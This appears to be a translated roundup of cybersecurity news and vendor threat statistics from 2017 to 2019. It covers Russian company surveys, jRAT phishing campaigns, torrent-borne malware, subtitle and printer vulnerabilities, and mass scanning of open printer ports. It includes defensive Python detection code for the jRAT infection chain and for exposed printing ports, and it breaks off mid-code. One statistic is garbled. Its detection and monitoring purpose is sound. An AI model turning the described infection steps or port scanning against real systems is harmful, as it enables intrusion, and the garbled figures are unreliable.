Looking at malware by sector, the most dangerous threats for banking were the Emotet file infectors, involved in nearly 133.5 prevented hacking attempts, and Ramnit, with 78,062 attacks blocked. In the mobile sector, for Android these were SMSreg (1,638,167) and Shedun (1,345,900); for iOS, IOS_JailBreakTool.A (397) and IOS_IBackDoor.A (65). In PoS attacks, fraudsters most often used malicious tools such as TinyPOS (1,264) and Recoload (286).

Both in Russia and around the world we see a clearly marked trend of transition from ransomware to cryptocurrency miners. If the battery of your laptop or smartphone has started draining rapidly, be sure to check it with a modern antivirus.
Mikhail Kondrashin, the technical director of Trend Micro in Russia and the CIS

Positive Technologies: every second company in Russia's regions suffered a successful cyber attack

On December 26, 2018 Positive Technologies specialists published the results of a survey of 192 Russian companies from different regions. 87% of survey participants acknowledged that the protection measures applied in their organizations are insufficient, and 27% of organizations noted that management does not allocate the necessary funds for cybersecurity.

The study showed that every second surveyed company had been subjected to successful cyber attacks. Among them were 43% of energy-sector enterprises. Experts note that the real situation may be even worse, since 30% of energy-sector respondents admitted that their companies have no incident identification practice at all.

Although most of the surveyed companies have a cybersecurity unit, only 30% of companies conduct regular penetration tests of their corporate infrastructure, and three quarters of those are financial institutions.

According to the survey, 16% of organizations turned to third-party specialists for incident investigation; in most of them the cybersecurity budget exceeds 10 million rubles. Only 6% of respondent companies have their own SOC (security operations center).

Companies try to compensate for the lack of comprehensive protection systems by deploying antivirus software and firewalls, which are used in practically all surveyed organizations. According to the survey, more than a third of respondents were unable to repel a malware attack and prevent infection of their resources despite using antivirus software. 57% of companies consider the absence or ineffectiveness of protection tools to be the reason cyber attacks succeed.

According to the study, organizations most often faced attempts to infect employee workstations and servers with various malware (encryptors, miners, etc.): 60% of companies reported this. 57% of surveyed companies faced phishing.

More than half of respondents named low employee awareness of information security as a possible reason for successful cyber attacks, and slightly fewer named unintentional employee actions. At the same time, most companies do not see a threat in insiders, the disloyal employees who disclose confidential company information for money or help carry out attacks on the company.

The survey also showed that most organizations that disclose information about incidents limit themselves to reports to the regulator and do not inform their clients and partners about the attacks.

According to the analysis, 32% of survey participants suffered real financial losses from cyber attacks. Every fourth company suffered infrastructure downtime, including 30% of industrial companies.

At the same time most respondent companies are confident they could eliminate the consequences of a cyber attack within a day, an assessment specialists consider too optimistic: depending on the type of attack, downtime can last 10 days or more, says Positive Technologies.

The study's results show that the security of regional organizations in our country is at a low level, noted Dmitry Sivokon, director of regional sales at Positive Technologies. Most respondent companies (82%) became a target for hackers in 2018. A third of respondents report real financial losses from cyber attacks. The losses are felt especially sharply against the background of modest budgets in most surveyed organizations: every second company's information security investment does not exceed 5 million rubles. As a result, many use only basic protection tools. With a limited budget, we advise selecting the most valuable assets and providing them with comprehensive protection.

Dmitry Sivokon also noted that people remain the weak link in data protection. According to him, business leaders need to instill a culture of information security in their employees. Qualified personnel are also needed, and their shortage is felt many times more strongly in the regions than in the Central Federal District. The shortage of data protection specialists was noted by every fourth survey participant. If a company has no dedicated cybersecurity unit, it should consider delegating some tasks to third-party specialists holding the appropriate licenses.

48% of attacks in the fourth quarter aimed at obtaining data

In Q4 2018 the number of personal data breach notifications continued to grow, and social engineering was used in every third attack, Positive Technologies reported on February 19, 2019. In addition, specialists of the Positive Technologies Expert Security Center detected a hacker group targeting Russian banks.

According to the study, the number of personal data breach notifications continues to grow. Specialists attribute this to the General Data Protection Regulation, the legal act establishing rules for protecting the personal data of EU citizens, coming into force. Companies that previously kept quiet about incidents will probably become more willing to notify clients about cyber attacks after news of the first fines and warnings, Positive Technologies analysts believe.

In Q4 of last year, 48% of attacks were aimed at obtaining data. Notably, in half of them the attackers used malware. Above all (28% of attacks), criminals were interested in credentials (logins, passwords) for access to various services and systems, including company employees' email.

The share of targeted attacks continued to grow, reaching 62%. Experts note that attackers increasingly use an "individual approach" in attacks on organizations, while individuals suffer from large-scale malware infections. A third of attacks on individuals aimed at obtaining data. Credentials are of greatest interest to attackers (they are stolen in 60% of cases), Positive Technologies noted.

The share of incidents that brought criminals a direct financial gain grew by 6% compared with the previous quarter. In Q4, specialists of the Positive Technologies Expert Security Center noted the activity of three groups attacking financial institutions: the already familiar Silence and Cobalt, and a group targeting Russian banks. The attackers sent malicious documents with macros, purportedly on behalf of FinCERT, and also through a compromised account of an Alfa-Capital employee. Despite the similarity of both attacks to the activity of the Treasure Hunters group, traffic analysis led experts to conclude that another cybercriminal group had appeared.

According to Positive Technologies experts, social engineering was used in every third attack in Q4.

Phishing of the victim company's employees has become a well-rehearsed attacker scheme within targeted attacks, noted Alexey Novikov, director of the Positive Technologies Expert Security Center. In November our specialists detected a malicious email attachment that allowed the attacker to capture webcam images, record sound, take screenshots and copy files from media devices. The criminals deftly drew recipients' attention with a catchy subject line and a blurred preview of the opened file showing a coat of arms, so that the document would inspire trust and a desire to read it, enabling the required script. While the victim saw the decoy document on screen, the Treasure Hunter remote-control malware was silently installed on the computer; it collected system information, sent it to a remote command-and-control server and accepted commands from it.

According to Evgeny Gnedin, head of the cybersecurity analytics department at Positive Technologies, emails are often sent for marketing purposes and contain buttons inviting the recipient to visit a website.

We remind you that before clicking such a button in an email, you should pay attention to the sender's address and to the link the click will lead to, says Evgeny.

Balabit study

Check Point: 97% of companies are not ready for fifth-generation cyber attacks

According to the 2018 Security Report prepared by Check Point Software Technologies, more than 300 mobile applications distributed through official app stores contain malicious code. Check Point specialists also note that the number of cloud threats, cryptominer attacks, and vulnerabilities in macOS and IoT devices continues to grow. Read more here.

Attack on pipeline companies

In early April 2018 it became known of hacker attacks on four American gas companies. As a result of the cyberattack some IT systems were shut down for several days as a security precaution.

Unknown cybercriminals attacked Boardwalk Pipeline Partners, Eastern Shore Natural Gas, Oneok and Energy Transfer, which service gas pipelines. The attacks took place at the end of March.

Oneok, which operates gas pipelines in the Permian Basin in Texas and in the Rocky Mountains (western North America), said that it decided to disconnect a computer system as a precaution after a contractor became an "apparent target for a cyber attack".

Four pipeline companies in the USA were attacked by hackers. IT systems were shut down

Oneok did not specify which system's operation was frozen. Energy Transfer said the company shut down its electronic data interchange (EDI) platform, used to exchange purchase orders, invoices and similar documents with clients; the platform had been developed by its subsidiary Energy Services Group to speed up document transfer and reduce costs.

This situation did not affect our operations. During the shutdown we execute all planned transactions manually, Energy Transfer spokeswoman Vicki Granado told the Bloomberg agency.

The Energy Services EDI solution is also used by other companies, such as Tallgrass Energy Partners and Kinder Morgan. Their representatives say their computer systems were not affected. Boardwalk Pipeline Partners confirmed a failure in its EDI system but did not specify the cause. Eastern Shore Natural Gas said the same.

By April 4, 2018 the electronic document management systems of all the gas companies that experienced the cyberattacks had been fully restored.

Rae McQuade, president of the North American Energy Standards Board (responsible for developing industry standards in the energy sector), says that disabling EDI systems does not stop gas transmission, but has a serious impact because companies have to look for workarounds for their interactions.

Andy Lee, a partner at Jones Walker, notes that the companies operating most of the roughly 3 million miles of the American pipeline network use third-party document-flow solutions and therefore depend on those responsible for the security of such systems. At the same time hackers are attracted by the easy accessibility of EDI, which lets them spread ransomware or steal data for subsequent sale.

According to Phil Neray, an expert in industrial control system cybersecurity, the hacker attack on the pipeline companies was carried out for financial gain, but it cannot be ruled out that the authorities of some countries were behind it.

The networks of companies that have important assets, for example pipelines, electricity or finance, can be targets for attacks. It has always been so, said John Harbaugh, chief operating officer of cybersecurity solutions vendor R9B.

Electronic Data Interchange systems are used by attackers to penetrate companies' IT infrastructure but are not the ultimate goal for them, argues Jim Guinn of Accenture.

There is no value in access to EDI, except to move across the network and do something else more malicious. All bad actors look for a way to get into the museum to steal the Van Gogh, he said, adding that there are no fundamental differences between the systems of oil and gas companies.[3]


By 2021 global damage from cyber attacks will exceed $6 trillion

As RedSys stated at the end of December 2017, the number of cyber attacks continues to increase. In the first half of 2017 alone, more than 900 cyber attacks were carried out, in which more than 1.9 billion data records were stolen. Most of the attacks were based on ransomware, which infects computers and restricts access to files in exchange for a ransom. In addition, some malware directly stole millions of dollars.

Overall, the 2017 cyber attacks highlighted the existing problem of ensuring information security, believes Dmitry Shumilin, director of the RedSys Information Security Center.

The trend observed in previous years says unambiguously that no reduction in the number and scale of attacks should be expected. Attacks will probably increasingly target specific vulnerable points, and an increase in attacks using Internet of Things devices is also expected, as their prevalence has been growing like an avalanche recently while their security leaves much to be desired, the expert predicts.

The growth in the number of threats will in turn lead to sharp growth in business and government spending on data protection. According to Cybersecurity Ventures forecasts, global cybersecurity spending over the next four years will be about $1 trillion. However, damage from cybercrime will also grow considerably. In 2015 the cost of global damage from ransomware attacks was $325 million. In 2017 these costs are estimated to exceed $5 billion, and by 2021 the figure will pass $6 trillion.

Any enterprise in the world, regardless of its size and type of activity, can suffer a cyber attack. At the same time many corporations have already thought about solutions to the problem, as confirmed by the budgets planned for 2018, Dmitry Shumilin added.[4]

A computer that "cannot be hacked" is invented

Michigan State University received a $3.6 million grant from the Defense Advanced Research Projects Agency (DARPA) to develop a computer that will be impregnable to hacker attacks at the hardware level[5].

The idea of the project, called Morpheus, is to make any attack on software or hardware futile. Morpheus hardware components will be an "unsolvable puzzle": all information contained in the system can be quickly and randomly redistributed across different components.

Main article: DARPA Morpheus "Unsolvable Puzzle"

PwC: most Russian companies cannot resist cyber attacks

Most Russian companies cannot successfully resist cyber attacks, says a study by the international consulting company PwC released in November 2017.[6] Half of the Russian respondents note that their companies have no overall information security strategy, and 48% of companies have no training program aimed at raising employee awareness of security issues. Read more here.

$1.3 billion lost by marketers in 2016 to DeviceID reset fraud

On September 20, 2017 AppsFlyer announced that its Protect360 solution had identified the scale of DeviceID reset fraud. According to the data obtained, this type of fraud accounts for over 50% of all app-install fraud, far more than previously assumed. By AppsFlyer's estimates, in 2016 marketers lost $1.1 to $1.3 billion to DeviceID reset fraud.[7]

The recently detected type of fraud is based on resetting the mobile device identifier. It is used by criminals operating highly organized "farms" of mobile devices (also known as "mobile farms" or click farms) to conceal their actions. Such farms can contain thousands of devices, and fraud on such a scale is hard to hide, so criminals resort to a number of tricks to stay in the shadows. One such trick is the repeated reset of the unique identifier of each mobile device. A phone in a "mobile farm" is then identified as new even after several thousand app installs, which costs companies several billion dollars in losses annually, AppsFlyer explained.

According to data obtained with Protect360, DeviceID reset fraud:

  • takes money from marketers in 10% of cases: on average one in 10 non-organic installs is fraudulent. This means that of every dollar spent on mobile advertising, 10 cents go straight into fraudsters' pockets;
  • affects iOS and Android equally;
  • damages 16 of the 100 leading advertising networks, in which over 20% of delivered app installs are fraudulent.

Source: AppsFlyer

This type of fraud is not limited to a particular country or region. Fraudsters generally target countries with high CPI (cost-per-install) payouts. In addition, fraudsters engaged in DeviceID resets target regions with a large number of campaigns and users, expecting to get lost in a large traffic flow and remain unnoticed by advertisers and networks.

According to the study, Eastern Europe, which includes Russia, accounts for 4.8% of the total financial losses caused by this type of fraud worldwide. The company established that the largest share of fraudulent installs with DeviceID reset falls on Asia, followed by North America and Europe. At the same time the greatest financial losses are suffered by North America (33.6% of the global total), Western Europe (17.1%) and Southeast Asia (14.5%).

Eset recorded 15 million cyber attacks on torrent users

On August 18 Eset published the results of its analysis of cyber attacks carried out via P2P networks. Since the beginning of 2016 Eset's telemetry system has recorded 15 million incidents in which malicious code was downloaded via popular torrent applications and file-sharing services. Hackers use P2P networks to deliver malware in two ways: by compromising trusted torrent applications or by hiding malicious content in "distributions".

In particular, in 2016 attackers targeted macOS users by hacking the website of the Transmission torrent client. They modified the application, embedding malicious code in it.

In April 2016 the KeRanger encryptor was downloaded from the Transmission website under the guise of the legitimate application. The developers removed the infected distribution within hours, but thousands of users were affected. KeRanger's authors used a strong encryption algorithm, which minimized the chances of data recovery.

In August 2016 hackers repeated the attack on the Transmission website. This time the Keydnap malware, designed to steal passwords from the iCloud Keychain and provide remote access to the system, was installed on the computer together with the torrent client. The Transmission team removed the trojanized application from the website within minutes of being contacted by Eset specialists.

However, according to Eset, not all incidents involve the software itself; there is also the risk of downloading malicious torrents. In April 2017 company experts detected the Sathurbot trojan, which spread this way: it hid in torrents of pirated software or movies, disguised as a codec.

Computers infected with Sathurbot were part of a botnet that contained 20 thousand devices at the time of the study. The botnet searched the network for WordPress-based websites and broke into them by guessing passwords. The compromised websites were used for further distribution of malicious torrents.

In February 2017 attackers distributed via torrent trackers a new encryptor disguised as Patcher, an application for cracking Adobe Premiere Pro, Microsoft Office for Mac and other paid software. The encrypted files cannot be recovered even if the ransom is paid: the pseudo-Patcher has no function for contacting a command-and-control server, so the encryptor's operators have no decryption key.

Just in case, I remind you of the liability for copyright infringement and use of pirated content, noted Alexey Oskin, head of technical marketing at Eset Russia. Nevertheless, the P2P ecosystem is not only and not just piracy; it has a number of legitimate uses. And, like any mass technology, file-sharing services are of interest to cybercriminals. Basic recommendations: use only licensed software, ignore suspicious websites and torrents, and protect your computer with a comprehensive antivirus product.

A global cyber attack could cost the world economy $53 billion

As experts from Lloyd's of London and Cyence calculated in July, a powerful global cyber attack could cost the world economy $53 billion, about the same as the estimated damage from natural disasters such as Hurricane Sandy. In the report the researchers described the possible economic damage from the hacking of a cloud provider and from a cyber attack on the operating systems running company computers worldwide, Reuters reports.[8]

Losses from a global cyber attack are comparable to the damage from natural disasters.

In the scenario assumed by the Lloyd's of London and Cyence experts, attackers insert into a cloud provider's software malicious code programmed to take computers out of service a year later. After insertion, the malware spreads among the provider's clients, from financial institutions to hotels, causing them huge losses from downtime and repairs.

According to the researchers' estimates, the extent of damage from serious cyber attacks can range from $4 billion to $53 billion and reach $121 billion. Losses from the hacking of operating systems vary from $9.7 billion to $28.7 billion. For comparison, the damage from Hurricane Sandy, the powerful tropical cyclone that claimed 185 lives in 2012, was $50 billion.

Positive Technologies: Russia took second place in number of cyberincidents

Every tenth cyberincident takes place in Russia, the number of ransomware trojans will grow thanks to the "ransomware as a service" model, and the power of DDoS attacks will increase due to vulnerabilities in "smart things". These observations and forecasts are contained in a new Positive Technologies study of current cyberthreats for the first quarter of 2017.

Positive Technologies experts note that in the first three months of 2017 there were only five days on which no data on new cyberincidents arrived.

The most attacked country in the first quarter was the USA (41% of all attacks), Russia took second place in the number of cyberincidents (10%), and Great Britain was third (7%). In total, no fewer than 26 countries worldwide were subjected to attacks.

The largest number of attacks was directed at government organizations: every fifth attack (20%) fell on them. The aggravated external and internal political situation in many countries may be the reason for this. Social networks, search engines, online stores and other online services were the target of every ninth attack (11%). The situation in the financial industry was slightly better, with banks accounting for 9% of all incidents. Next come education (8%), medical institutions and the service industry (7% each), industrial companies (5%) and defense enterprises (3%).

In the study, experts considered the incidents from two angles at once: what the attackers targeted and how they did it. Most attacks were aimed at companies' IT infrastructure (40% of attacks). Attackers were mainly interested in sensitive information (for example, personal data and payment card holder data) that can be sold on the black market. However, experts note a decline in cybercriminals' interest in personal data and, accordingly, a decline in its price, which may be connected with oversupply on the market.

Attacks on web applications took second place in prevalence (33%); they open a range of opportunities for attackers, from obtaining confidential information to penetrating the internal corporate network. Most web attacks were carried out through vulnerable components (outdated libraries and CMS systems), although web application vulnerabilities were also exploited. In early 2017 Positive Technologies specialists recorded a series of attacks on the websites of government organizations and various businesses.

The number of attacks on POS terminals (3% of all attacks) also grew significantly, exceeding the figure for the first quarter of 2016 almost six-fold and amounting to 63% of all such attacks for the whole of 2016. Attackers used remote administration tools and trojans.

As for the most popular attack methods, the use of malware still takes first place. Positive Technologies experts note the emergence of the "ransomware as a service" model: malware creators are increasingly not the organizers of attacks themselves, but earn by selling trojans to criminal groups. Thus malware developers, having profited from the sale, can prepare a new trojan while other criminals carry out the attack itself.

As for DDoS attacks, in the first quarter of 2017 their power increased significantly as a growing number of IoT devices were connected to botnets. In March 2017, another piece of malware (ELF_IMEIJ.A) targeting IP cameras, video surveillance systems and network recorders made by AVTech was discovered. In addition, over 185 thousand vulnerable IP cameras were found which could also become part of a new botnet.

Fortinet: the efficiency of tracking and managing distributed infrastructures is decreasing

In June 2017 Fortinet published the findings of its global threat landscape report. The subject of the research was the cyber-threat chain. Three main attack directions were considered in the context of corporate technologies and current trends in the field: application exploits, malware and botnets. The research shows that, despite wide coverage of the more high-profile attacks, the large-scale "Cybercrime as a Service" infrastructure was behind the bulk of the successful attacks that organizations faced. The three main conclusions stated in [9] are given below [10].

1) Attackers always build on past experience when developing attack tools that are ready for use at any time and in any place

Thanks to modern tools and the "Crime as a Service" infrastructure, attackers can quickly operate on a global level. This means that on the Internet there are no distances or geographic boundaries, since most threats operate worldwide rather than in particular regions. Criminals are always ready to attack and constantly search for vulnerabilities at the international level.

Knowledge of exploit development trends, and of how ransomware functions and spreads, will help avoid the harmful effects of the attacks that follow WannaCry. Ransomware and its variants spread worldwide and strike hundreds of organizations at the same time.

  • Ransomware. Slightly less than 10% of organizations detected ransomware activity. On any given day, 1.2% of organizations detected ransomware botnets in their corporate networks. The greatest activity was observed at weekends: attackers tried to push malicious traffic past the security staff on weekend duty. As the average traffic volume of the various ransomware botnets grew, the average number of organizations targeted also increased.
  • Exploit trends. 80% of organizations reported detecting exploits of high or critical severity in their systems. Most of these targeted exploits were developed within the last five years, but attackers also used vulnerabilities dating from the last century. The distribution of exploits across geographic regions is fairly even. This is probably because a huge number of exploits are fully automated by tools that scan the Internet for vulnerabilities.

2) Interconnection of infrastructures and IoT accelerate the spread of malware

As the volume of data and resources transmitted between users and networks grows, so does the number of attacks across geographic regions and industries. Malware research gives a picture of the stages of attack preparation and execution. It should be noted that protection against mobile malware is complicated by factors such as the vulnerability of devices inside the internal network, frequent connections to public networks and the lack of corporate control over user-owned devices.

  • Mobile malware. The prevalence of mobile malware remained stable from Q4 2016 to Q1 2017: about 20% of organizations detected mobile malware. This quarter, most of the list of the 10 most widespread threats consisted of malware families targeting Android devices. Its share among all types of malware was 8.7% in Q1, against 1.7% in Q4.
  • Regional distribution. Mobile malware is spreading more and more widely in all regions except the Middle East. In all cases the observed growth is statistically significant and cannot be attributed to random fluctuation. Viewed by region, the trend in the spread of malware targeting Android devices shows the most obvious geographic link.

3) The efficiency of tracking the state of flexible distributed infrastructures is decreasing

Threat trends depend on the environment, so it is very important to be aware of the changes that information technologies, services, controls and behavior undergo over time. Access to up-to-date data makes it possible to form a view of security policies and management models in general, and to successfully monitor the development of exploits, malware and botnets as networks become more complex and more distributed.

As the number of potential attack vectors within the expanded network increases, the efficiency of tracking and managing modern infrastructures decreases. Trends such as the universal adoption of private and public cloud solutions, IoT development, the connection of a large number of diverse smart devices to networks and the emergence of out-of-band threat vectors, such as shadow IT resources, have led to an excessive increase in the load on information security specialists.

  • Encrypted traffic. The average ratio of HTTPS to HTTP traffic reached a record value of about 55%. This trend helps preserve confidentiality, but creates difficulties in tracking and identifying threats. Many security tools are insufficiently effective at monitoring encrypted data. Organizations, especially those with a higher share of HTTPS traffic, may face threats hidden in encrypted data.
  • Applications. On average, an organization uses 62 cloud applications, about a third of the total number of detected applications. At the same time the number of IaaS applications reached a new maximum. The problem for many organizations is that when data moves to the cloud, visibility into its state can decrease considerably. In addition, there is a questionable tendency to store growing amounts of data in such applications and services.
  • Industries. Cluster analysis by industry showed that most sectors face the same threat vectors. Education and telecommunications were among the few exceptions. This means that attackers can easily reuse similar attack vectors across sectors, especially with automated tools.

Check Point: hackers can use subtitles to hack millions of devices

In May 2017 Check Point announced the discovery of a new attack vector threatening millions of users of popular media players, including VLC, Kodi (XBMC), Popcorn Time and Stremio. By creating malicious subtitles, hackers can take control of any device on which these media players are installed. This includes mobile devices, PCs and Smart TVs.

"The subtitle production process is complex; more than 25 different formats are used in it, each with unique features and capabilities. This fragmented ecosystem, along with limited security, means a set of vulnerabilities exists, which makes it an extremely attractive target for attackers," says Omri Herscovici, head of the vulnerability research team at Check Point Software Technologies. "We found that malicious subtitles can be created and delivered to millions of devices automatically, bypassing security systems. As a result, hackers gain full control over the infected devices and the data they contain."

Check Point's research team discovered vulnerabilities in the four most popular media players, VLC, Kodi, Popcorn Time and Stremio, and reported them in accordance with responsible disclosure practice. Using the vulnerabilities in these platforms, hackers can take control of the devices on which they are installed.

Subtitle vulnerability infographic

Subtitles for films and TV shows are created by many authors and uploaded to shared online repositories, where they are indexed and ranked. Check Point researchers found that, by manipulating the ranking algorithm, malicious subtitles are automatically downloaded by the media player, allowing the hacker to gain full control over the entire subtitle supply chain without any user involvement.

All four companies have fixed the vulnerabilities on their platforms. Stremio and VLC have also released new versions of their software including these changes. "To protect themselves and minimize the risk of possible attacks, users should make sure they update their media players to the latest version," Herscovici concluded.

Hunting for government databases

The NTT Security 2017 Global Threat Intelligence Report, which includes survey data from more than 10 thousand clients on five continents, shows that government institutions are increasingly becoming targets of cybercriminals. Attacks often intensify on the eve of important geopolitical events, such as presidential or parliamentary elections, meetings of politicians, votes on important issues in parliament, etc.[11]

The danger is that government institutions can be attacked both from abroad and by local hackers. Government institutions hold a large amount of varied information: from citizens' personal data to intelligence information. Thus, data from a government institution can be of interest to ordinary extortionists as well as to well-organized criminal and terrorist organizations. Moreover, criminals today also hunt for data that can influence public opinion: compromising information on politicians, their expenses, etc. As a result, attacks on government agencies are becoming more complex and larger in scale, and unfortunately protection systems cannot always withstand the threat.

The analysis showed that about 63% of all cyber attacks originate from IP addresses in the USA, another 4% from Great Britain and 3% from China. The main cyber security threats are phishing, e-mail compromise, DDoS attacks, etc. Internet of Things (IoT) structures and cloud servers are both a potential source and a target of attacks. Of the IoT attacks detected in 2016, 66% attempted to discover specific devices, such as video cameras.

Campaigns distributing Java malware

In April 2017 Zscaler experts noted sharp growth in the number of malicious Java-based remote administration tools (jRAT).[12]

The scheme is fairly simple: using various tricks (first of all, social engineering), attackers try to get users to open the attachments to their letters; these attachments contain malicious JAR files. The letters usually look like messages from tax authorities or like orders for goods or services. Once on the machine, the malicious JAR file downloads a VBS script that scans the system for firewalls and antivirus software. When the scan is complete, the JAR file writes itself to the Temp folder and starts.
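The infection chain just described leaves a recognizable trail in process-creation telemetry. The following added example (not Zscaler's code; the Sysmon-like event fields, parent image names and sample events are assumptions and constructed data) hunts for it: a mail client launching java/javaw with a .jar, that JAR spawning a script host with a .vbs, and a JAR later run from the Temp folder.

```python
"""Hunt for the jRAT delivery chain in process-creation events.

Rules (assumed event fields: pid, ppid, image path, command line):
  mail->jar->vbs : java(.jar) whose parent is a mail client and which spawned
                   wscript/cscript with a .vbs (the firewall/AV check stage)
  jar-from-temp  : java(.jar) started from a Temp directory (the relaunch stage)
The events at the bottom are constructed samples, not real telemetry.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable that started
    cmdline: str   # its full command line


MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed parent images
JAVA_IMAGES = {"java.exe", "javaw.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _runs_jar_from_temp(cmdline: str) -> bool:
    low = cmdline.lower()
    return ".jar" in low and "\\temp\\" in low


def find_jrat_chains(events: list[ProcEvent]) -> list[dict]:
    """Return one finding per suspicious java launch, in event order."""
    by_pid = {e.pid: e for e in events}
    children: dict[int, list[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    findings = []
    for e in events:
        if _basename(e.image) not in JAVA_IMAGES or ".jar" not in e.cmdline.lower():
            continue
        parent = by_pid.get(e.ppid)
        vbs_kids = [c for c in children.get(e.pid, [])
                    if _basename(c.image) in SCRIPT_HOSTS and ".vbs" in c.cmdline.lower()]
        if parent is not None and _basename(parent.image) in MAIL_CLIENTS and vbs_kids:
            findings.append({"rule": "mail->jar->vbs",
                             "pids": (parent.pid, e.pid, vbs_kids[0].pid)})
        elif _runs_jar_from_temp(e.cmdline):
            findings.append({"rule": "jar-from-temp", "pids": (e.pid,)})
    return findings


SAMPLE_EVENTS = [  # constructed sample telemetry
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\OUTLOOK.EXE", "outlook.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Java\jre\bin\javaw.exe",
              r'javaw.exe -jar "C:\Users\alice\Downloads\tax_notice.jar"'),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\chk.vbs"'),
    ProcEvent(400, 300, r"C:\Program Files\Java\jre\bin\java.exe",
              r'java.exe -jar "C:\Users\alice\AppData\Local\Temp\svc.jar"'),
    ProcEvent(500, 1, r"C:\Program Files\Java\jre\bin\javaw.exe",      # benign IDE
              r'javaw.exe -jar "C:\Program Files\IDE\ide.jar"'),
    ProcEvent(600, 1, r"C:\Windows\System32\wscript.exe",              # benign logon script
              r'wscript.exe "\\fileserver\netlogon\map_drives.vbs"'),
]


def run_sample() -> list[dict]:
    return find_jrat_chains(SAMPLE_EVENTS)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding["rule"], finding["pids"])
```

The benign IDE launch and the logon script produce no findings; only the mail-spawned JAR with its VBS child and the JAR relaunched from Temp are flagged.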

In April 2017 Zscaler experts noted sharp growth in the number of malicious Java-based remote administration tools

The code of the main malware has a complex structure in which separate modules are responsible for separate tasks, for example for connections to the command-and-control server. The malware's code contains the URL of a server from which it could download additional malicious modules. Interestingly, the same server had previously been seen distributing the Loki malware. As of April 21 it is inactive. Malicious components are mostly downloaded from file-sharing resources such as Dropbox.

Zscaler experts noted that the jRAT malware they encountered had a number of atypical features. The malware file is triple-encrypted and the program code is heavily obfuscated. All this is done to prevent automatic detection by antivirus software and to complicate manual or automated analysis. In addition, the malware author even took the bit width of the operating system into account: the JAR files come with both 32-bit and 64-bit DLLs.

"Attackers continue to improve their tools. The more money a piece of malware can bring, at least in theory, the more effort its authors will make to safeguard it and prevent analysis," says Ksenia Shilak, sales director of SEC-Consult in Russia. "The surest way for users to protect themselves is not to open any attachments that raise the slightest suspicion, and not to run Java on the computer without special need."

Dangerous network printers

On February 1, 2017 researchers at Ruhr University in Germany discovered a number of critical vulnerabilities in the firmware of several models of network printers. According to their research (officially presented in May 2017), using the discovered vulnerabilities attackers can obtain copies of documents sent for printing and even take control of the corporate network.

As of February 7, 2017, all printers are controlled by the computer during printing using several special protocols and languages. In the case of network printers, the computer first initializes the printer via the device control protocol, then establishes data exchange with it via the network protocol, and then sends it the print job, first in a job control language and then in a page description language[13].

In other words, at the start of printing the computer finds the printer on the network, wakes it up and tells it that, for example, two documents need to be printed: first the document with one identifier, then the one with another. At the same time, for each document an additional description is sent of exactly how it should be printed: advance one line, apply ink at such-and-such coordinates, etc. The main job control and page description languages were written in the 1970s-80s and are used on all printers today.

The discovered vulnerabilities are potentially present in all printers (because of the common control languages), but pose the greatest threat on network devices, since these can be reached remotely rather than over USB as with home devices. The simplest thing an attacker can do to a network printer is to send it into an infinite loop, forcing it to perform the same operation over and over. The device then stops responding to all external commands.

The tested printers: red mark, vulnerabilities found; pink, vulnerabilities partially found; white, no vulnerabilities found (2017)

According to the researchers, vulnerabilities were found in 20 printers from Dell, HP, Lexmark, Brother, Samsung, Kyocera, Konica and OKI. The scientists believe the problem is more widespread, but cannot verify this assumption because the vulnerability research project is not funded. The researchers sent reports on the flaws they found to the manufacturers, of which only Dell responded; as of January 2017 the vulnerabilities had not been eliminated.

The researchers created their own tool, the PRET program, which allows any printer connected via USB, Wi-Fi or LAN to be tested for the vulnerabilities.

A young hacker hacked 160 thousand printers worldwide

The hacker calling himself Stackoverflowin, who also styles himself a "god of hacking", claims to have written a script that automatically searches the Internet for publicly accessible printers and point-of-sale terminals supporting the RAW, Internet Printing Protocol and Line Printer Remote network printing protocols, which operate on ports 9100, 631 and 515 respectively[14][15].

The script forced the discovered devices with open ports to print a boastful "chain letter" from the hacker containing a recommendation to close the printer ports urgently.

Even after these messages had been sent, The Register, using a search engine, found more than 143 thousand printers with port 9100 open.
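The ports named above are the ones a defender should confirm are not reachable from the Internet. This added example (not from The Register or the researchers; the firewall record format and the internal address ranges are assumptions, and the records are constructed) builds an inventory of internal printers that accepted outside connections on 9100, 631 or 515.

```python
"""Inventory internal printers reachable from outside on printing ports,
from firewall ACCEPT records of the assumed form
    'ACCEPT proto=tcp src=IP:PORT dst=IP:PORT'.
"""
from __future__ import annotations

from collections import defaultdict
from ipaddress import ip_address, ip_network

PRINT_SERVICES = {9100: "RAW", 631: "IPP", 515: "LPR"}   # ports from the text
# Assumed internal ranges (RFC 1918). Listed explicitly rather than using
# ip_address(...).is_private, which also classifies documentation ranges
# such as 203.0.113.0/24 as private and would hide the sample sources below.
INTERNAL_NETS = [ip_network("10.0.0.0/8"),
                 ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_record(line: str):
    """Return (src_ip, dst_ip, dst_port) for accepted TCP records, else None."""
    parts = line.split()
    if len(parts) != 4 or parts[0] != "ACCEPT" or parts[1] != "proto=tcp":
        return None
    src_ip, _ = parts[2][len("src="):].rsplit(":", 1)
    dst_ip, dst_port = parts[3][len("dst="):].rsplit(":", 1)
    return src_ip, dst_ip, int(dst_port)


def exposed_printers(records) -> dict[str, dict[str, set[str]]]:
    """Return {printer_ip: {service: {external_source_ip, ...}}} for accepted
    external -> internal connections on a printing port."""
    exposure: dict[str, dict[str, set[str]]] = defaultdict(lambda: defaultdict(set))
    for line in records:
        parsed = parse_record(line)
        if parsed is None:
            continue
        src, dst, port = parsed
        if port in PRINT_SERVICES and is_internal(dst) and not is_internal(src):
            exposure[dst][PRINT_SERVICES[port]].add(src)
    return {dst: dict(services) for dst, services in exposure.items()}


SAMPLE_RECORDS = [  # constructed
    "ACCEPT proto=tcp src=203.0.113.7:51234 dst=10.1.2.30:9100",   # raw port from outside
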